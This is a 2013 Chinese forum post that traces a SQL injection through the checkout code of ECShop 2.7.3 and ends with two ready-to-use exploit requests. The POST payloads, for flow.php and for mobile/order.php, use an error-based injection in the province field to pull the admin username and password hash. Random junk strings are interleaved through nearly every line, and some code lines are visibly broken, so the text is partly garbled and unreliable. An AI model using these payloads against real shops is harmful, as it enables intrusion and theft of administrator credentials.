前段时间大概2012年圣诞节左右,在t00ls上看见ecshop全版本注入,当时也下载了最新的程序分析了下,最近考试比较忙,今天刚考完,把我分析的记录下来。! P, c! [# G' G; e+ M3 T0 d/ l
# Z/ m: L( W0 Q
漏洞关键文件:
+ s/ \8 f* I/ [' X3 b
) w: H% @/ P; W2 {/ Y, V /includes/lib_order.php/ b/ A* r2 i: n: G. U6 t8 x5 c
" B. Y. h8 O M. L0 X8 H5 R
关键函数:1 ?' w: n6 j4 f% \2 V5 r- G
) l- X2 c/ ~7 S* m ^
2 {: K. S R' {
9 Q( o7 z6 Q( f' g
01 function available_shipping_list($region_id_list) 1 |. l' P. M- C% |* V( u
( h# @5 @4 X1 q. g3 F" k b- H02 {
- I. \2 l: n/ V1 K' g# [4 @& y/ u/ U$ M$ M) ^# G; ~
03 $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
- a9 `* i- U) R! x8 c+ b/ P- }9 f8 G5 h" P/ T3 R
04 's.shipping_desc, s.insure, s.support_cod, a.configure ' . 8 x% g* B, n! }8 G* K' q& M
! u* n+ u4 J* o. R9 P) |) l/ {
05 'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' . ! a! D: f5 V8 }* R
o' y8 l" ^+ F* V4 S06 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' . " q2 y$ O# {3 J2 _: m* B1 S
7 ] P6 k% o) O07 $GLOBALS['ecs']->table('area_region') . ' AS r '.
7 V. w5 z( ]! [$ J1 q0 G4 s5 }$ _8 Z/ S% h4 O+ x% _
08 'WHERE r.region_id ' . db_create_in($region_id_list) .
, M* {9 Q/ U; o7 C: k8 ] C. z6 v* |: l) a: A* h
09 ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
$ W1 I0 _, K: d$ S& a; u. P* Q9 e
10
1 m9 G" _; G& _/ _$ w" J0 ?2 l
, W9 u' x$ V' y+ y; x3 M7 r11 return $GLOBALS['db']->getAll($sql);
" m! u& P8 i+ `2 t" r$ g$ s f: v
4 x4 p0 j3 p- W2 V! B# E* }12 } ' N" B1 R! J2 @: }
5 @8 k. Z, Z) S6 b! U0 e( D# ^' g显然对传入的参数没有任何过滤就带入了查询语句。
1 s, F/ \. l, Q6 e, @% W& i" t ' ~/ [( @ w1 Y7 ~) v
下面我们追踪这个函数在flow.php中:9 G* R/ n% h8 b0 W: ?" M, ~
第531行:
6 }4 k& U; w/ Z8 L% \: W% U5 N1 f
5 n4 E* y0 w& L4 L/ m' Y: ?( I. `1 $shipping_list = available_shipping_list($region);
) w3 C2 q: n# ~5 Z" \- F( L6 G7 M/ f3 e& `: H
4 e( B! {. I, B! x+ ^+ C9 I {
# x3 \$ S& ]3 w( G- j + i; W7 w, b" L- ^8 @
9 u; f7 W8 U) B. i" I, E
再对传入变量进行追踪:
) X! u# o2 ]1 B. H0 V9 }. n, y J" ~) E
第530行:
- r3 J' I; ?8 ]" [0 p$ u8 B! c& {; w6 \2 n4 p; }
1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']); 1 w3 ^3 _; D& N& N# W7 z
! R) N ^; \9 o# v, U
5 K! I4 `+ c0 B8 L- Z, A# K
; k0 F6 E* L5 Q* ? f! N( Z $ R% `8 e+ S' C: `. s
. d, u' \/ b. q7 _6 {
第473行:
3 k( z: n7 g4 ~. |: p7 ?
9 F: l# U% ]6 Y* X) K6 ?5 ?9 {2 q1 $consignee = get_consignee($_SESSION['user_id']);
' o) ~1 W5 I9 o2 { I4 Q. ]% b6 E' _( v% {& }% ~- e
到了一个关键函数:
4 |. g$ C8 q" A3 H/ I+ Y$ u( k
/ g7 v3 }; t7 v/ _; }/includes/lib_order.php
8 Q7 C4 A! B4 n/ k, I2 P6 I" T; Y8 ~0 \) v: v! P3 G) Q1 X
" [! r9 P N, W4 ]4 p) x1 R
. d+ p" H, s3 i! M" w 7 q# b4 r2 l$ I" ]" R% k
0 i4 B0 F& c' B2 T
01 function get_consignee($user_id) 8 R% E# h3 d! x7 b
: Z I/ K2 C& _4 {# T1 n
02 { . R: |6 R N" m9 H5 `/ G
% X8 j+ k+ }# _' t03 if (isset($_SESSION['flow_consignee'])) 0 Y% w+ t* q+ A' b' ]' M
3 f0 [- m8 G% T3 T$ j# w
04 {
# A8 Z8 ^+ |, F! z
. a0 g# P O N @05 /* 如果存在session,则直接返回session中的收货人信息 */
. }. k$ I9 P, L# H! U
* C# ]+ O; h# {6 z3 m06 - g0 Z! R- G+ U. `
$ W, d+ Z9 g, {' m07 return $_SESSION['flow_consignee'];
7 u' M) T# p# b a u& d3 [$ |3 m1 }5 M, \
08 }
$ h5 ~3 }" X* L1 ~
. w; x6 y# P* u. L1 o/ f09 else
8 ]1 x+ O7 N/ [: X2 V ?% ?2 U
1 t6 i1 s3 i$ o3 ]3 A) `10 { $ N2 N' y Z1 L" `
6 n! R d5 n: [4 r! t: ~
11 /* 如果不存在,则取得用户的默认收货人信息 */
; m* |4 b0 e2 w9 h5 E% x; R4 `4 q4 B( B
12 $arr = array();
. `2 [; I# U. U C; U+ E, M1 F* h1 P; S2 G) E8 w+ D
13 6 w$ l* F, j& t4 K5 x5 O8 u$ E
' t+ w: N9 I* c( M @9 Y
14 if ($user_id > 0)
' T+ } y% j: T0 k; Z, a$ g C: V% b/ _+ Y) B0 ]% u
15 {
2 P5 u9 t2 p$ d. N
& I4 V5 G5 L( b- ~5 c! w16 /* 取默认地址 */
6 h1 d$ `+ u+ Z, m8 f2 U i9 Q: r1 t0 y, A I; K6 m) I
17 $sql = "SELECT ua.*".
$ J$ o0 J4 X5 h/ l1 f7 e5 n' v# F0 Y! K) g% ^+ @
18 " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.
. D6 k# U6 Y- r+ b) K1 o' s/ G2 R
19 " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";
" S6 [8 c+ k$ O+ N* n+ |& p2 _7 d" f, r3 D: J+ W8 P! S, Q. C6 y
20
}* P, [, A4 W% @2 I) U7 n( _: b( _6 n$ M& R1 ~
21 $arr = $GLOBALS['db']->getRow($sql);
j3 _; ]1 G5 m1 W
, R X& T3 k3 p) t0 v22 }
( z' j" r7 G% G; t7 D% `* J3 Z+ e1 Q, P0 j' j
23 7 L4 y, T" ^" F. @, t; A
! p% g4 ^7 R ~- L. H/ v5 r24 return $arr; ; |% W5 f) |- Q3 b0 n, ^
8 [8 n! `& o, \# A* A8 E0 A
25 } ; r3 O5 @0 Z2 ^+ [
# E# R/ R: Z4 n" W0 q7 ? s: g26 } 4 e; I* Z! L# { {! N" g9 X
& {, Z, R& }4 `# `5 V8 Y" T) S) N0 F
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢?
6 Y9 q# `- E' M H0 g# B# s/ Q
$ O5 y7 S3 d0 m m" F
% ?+ U2 C: b$ ^2 I5 k
1 e, P* L- V; {8 d5 B0 A关键点:4 I8 W9 p; t; M, C. C
% `% [9 B+ M+ ?% J第400行: $_SESSION['flow_consignee'] = stripslashes_deep($consignee);: ~ ?6 F+ b( t. F* A8 I
+ N6 w! Q$ r: j# [这里对传入参数反转义存入$_SESSION中。
0 m6 C2 d7 Q3 A, j2 K) ]# [
7 V Q& W T; D
4 F' l# F% T. C5 f
# y: F C4 I- k0 ^# g/ @然后看下:
% s! t; k6 @3 ~) ^6 C# i" a/ O% J- V; D6 {
: u6 u' m/ B( M/ I* b0 e& R' s( \+ b: o5 `3 k
1 B+ ?% {2 E, m( z7 f, ]- Y4 E
8 ?4 l6 p7 H* e3 R% P. c8 B01 $consignee = array( 4 ~ e# y( k7 c, p% c! j
3 K1 \5 k- l) A$ a' E9 ^% x5 s
02 'address_id' => empty($_POST['address_id']) ? 0 :intval($_POST['address_id']),
I9 m0 x; t" P5 L+ K1 x5 d; V6 \" B8 v. F
03 'consignee' => empty($_POST['consignee']) ? '' : trim($_POST['consignee']), ( x: z5 P3 A3 p3 b1 W
& Z& J# H3 C6 y" ~$ h
04 'country' => empty($_POST['country']) ? ''  _POST['country'],
# [; z8 J; {/ x1 L" O. `8 r' n+ h8 Q3 d5 ]' @0 W4 x
05 'province' => empty($_POST['province']) ? '' _POST['province'],
, b7 ^4 b! x8 G$ D
% u$ T W. i4 U# }06 'city' => empty($_POST['city']) ? '' _POST['city'],
N3 k* v% m& _1 L& Q7 W. ^; H8 ~) N8 g
07 'district' => empty($_POST['district']) ? '' _POST['district'],
# }. o' O0 j, r. q' K8 U' M$ F9 G. o% f
08 'email' => empty($_POST['email']) ? '' _POST['email'],
3 [9 V# @1 \# w6 a
( T, }9 ?, t T9 Q* k( x2 D09 'address' => empty($_POST['address']) ? '' _POST['address'],
0 L9 U" N6 L9 v- i2 H0 ?% K0 q1 \
" c, p! X: _$ V- f$ Y6 y10 'zipcode' => empty($_POST['zipcode']) ? '' : make_semiangle(trim($_POST['zipcode'])),
" [, ~# t' ^. L: B6 W0 L1 P4 z* \5 F! D' W: V$ o" |. K( K. G
11 'tel' => empty($_POST['tel']) ? '' : make_semiangle(trim($_POST['tel'])), 2 U0 `: V5 r) Z
5 M" ?9 {5 }/ ~: n( W4 k* }: o, T12 'mobile' => empty($_POST['mobile']) ? '' : make_semiangle(trim($_POST['mobile'])),
3 D3 g1 C$ l: A& r: _
3 w2 a( ?5 b$ J1 a/ {! Z3 e/ a; d4 z13 'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],
9 Y' Y0 T# Y* {( ]9 B$ Z3 a$ m1 ]! v/ m
14 'best_time' => empty($_POST['best_time']) ? '' _POST['best_time'], 1 E, j/ v5 [$ b, V
7 X$ G2 M: o) r" P, R0 q2 u" j# D, s
15 );
M8 V- d$ v5 W& B) `+ Q- N
& [% ~: Y, G/ X, e好了注入就这样出现了。& J* Q6 v( X0 H# |6 ~' t' M9 U
/ ^& Z% ?. S L7 |' h==================( u3 P! d; U/ x$ ?7 A7 F$ }2 H# g
: ~; |! G7 E. m4 ?/ ]
注入测试:1 R# O" N9 N$ E6 U- b5 A
+ |3 k$ V* Y' D1 k* `( {1 u2 f
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)4 c k6 n' G9 c+ T( p7 c
* x; ~- P+ l* g. _, f8 ]测试程序:ECShop_V2.7.3_UTF8_release1106
) J3 i& Z. c$ ]9 q+ h5 X2 j: I) T# W9 A1 h
9 f/ L g5 M. N( `5 r( e- h$ a* Q
9 K; k. z5 r# x1.首先需要点击一个商品加入购物车" m F. M( h4 E6 O
4 H# B8 }4 p' G9 q3 h
2.注册一个会员帐号
+ m5 q/ d) \2 E$ x* r
" v, Q+ I) C. w9 k |7 H6 U3.post提交数据3 Y5 W, ^0 q) a+ w5 ^
/ k/ A! I- |' u
0 O# p [8 U: O8 Y( N; a! Q' P! ~( V( S9 Q: D3 s
1 http://127.0.0.1/ecshop/flow.php . j) J2 m: h$ X! {, b) S
2 j+ b) O, V3 I
2 ; v @5 I' j) W' |
" ]9 Q2 e5 E- D2 x3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
0 _8 Q# r5 {2 A' o举一反三,我们根据这个漏洞我们可以继续深入挖掘:
( V- y+ ~1 h- d
" n3 p9 ^3 p9 A' l我们搜寻关键函数function available_shipping_list()3 ~) [' l( `+ A& K$ \' g& A; _8 e
^; s; ^) d: Z: P在文件/moblie/order.php中出现有,次文件为手机浏览文件功能基本和flow.php相同,代码流程基本相同( G" b. `: W$ j% p3 a
7 V4 t! `3 E, ]; k; d+ P利用exp:
% K) _5 b$ s9 t1 h( D" z2 E; q" n' n B7 M7 |( g8 R% S
1.点击一个商品,点击购买商标1 M' ?: q9 ^# s
- R6 `6 s R9 J1 c- {2 g: R2.登录会员帐号
: @' a! E6 s0 d5 K: i; e# T+ o% J# m! f
3.post提交:: j+ u: E. `4 D- j0 c9 X, ~
1 j+ V2 b4 l- Q9 [$ \+ J; B: S2 n' [' Khttp://127.0.0.1/ecshop/mobile/order.php x" r/ V+ w: J
9 G0 _ h# M4 f7 q( l, s* J
4 T1 l" R! c/ ]
7 Z% }% _* ^( g( i& Tcountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=0 p8 u- u) j4 Z. o$ L, v! ]7 K% p6 E% _
7 g, b i P: m! z$ c$ T |
发表于 2013-1-13 09:48:03
收藏
支持
反对